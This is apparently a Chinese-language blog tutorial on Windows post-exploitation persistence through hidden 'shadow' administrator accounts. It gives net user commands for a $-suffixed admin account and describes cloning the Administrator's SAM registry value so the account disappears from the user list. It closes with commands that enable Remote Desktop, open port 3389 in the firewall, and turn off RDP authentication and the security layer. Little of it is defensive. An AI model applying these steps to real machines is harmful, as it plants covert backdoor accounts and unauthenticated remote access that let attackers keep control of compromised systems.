前言
影子用户相信大家都是比较熟悉,是一种权限维持的好方法。
注:单机和域环境都可以使用,但是域中可能没有那么好用。
复现
一.本地
1. 正常的影子用户
我们在cmd命令中在生成用户时,在用户名后面加上$就可以
net user test$ 123456 /add
net localgroup administrators test$ /add这时候我们可以看到net user是看不到他的,但是在用户那里可以看到它也可以正常删除它。
2.工具版
这里我们讲工具上传上去
这里我们再次看到用户那里,虽然还是可以看到test$用户,但是发现删不了它了。
这里看到他的属性,怀疑是因为没有组的原因,但是我重新生成隐藏用户,且删除了他的组,但是发现还是没有这个效果,这里看看中途的一些翻译。
这里我们可以看到是进行了一些注册表的操作,然后去找一些文章分析一下。
当然现在不意味不能删除这个用户了,我们可以通过注册表删除。
当然有的人发现SAM那里没东西了,那是你没权限,你说你administrator没权限,是的,还真的没有,需要你自己右键属性给自己加上,然后重新打开注册表
3.手工升级puls版
之后看到这个文章 隐藏用户(影子用户)的创建与利用进行权限维持 就顿悟了,这里我们复现一下。
第一步还是新建一个影子用户,并把它加入管理员组中
然后来到注册表看到0xf14就是对应Administrator用户,这个通常是固定的,我们将他F的值复制出来
然后这里看到test$对应的是0x3f5,我们000001F4中F的值,复制到000003F5中的F中
然后我们讲test$和000003F5导出
然后使用cmd(管理员权限),将test$影子用户删除,然后再将两个导出的注册表文件导入
这时候我们发现,擦用户这里没有test$用户了,但是他还是存在的,可以看注册表中发现用户还是存在的,真的贱,我好喜欢
然后这里我发现,我并没有出现远程登录不上的问题,有这个问题的可以参考上面那篇文章。
然后这里我们肯定要知道一下打开远程桌面的操作。
//使用wmic来开启远程桌面
wmic RDTOGGLE WHERE Servername='%COMPUTERNAME%' call SetAllowTSConnections 1
//修改注册表开启远程桌面
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /D 0 /f
//设置防火墙允许远程桌面登录
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
//关闭鉴权模式,就是输入的账号和密码是否正确都可以登录
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" v UserAuthentication t REG_DWORD /d 0
//关闭securitylayer安全层验证,配合上面的
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0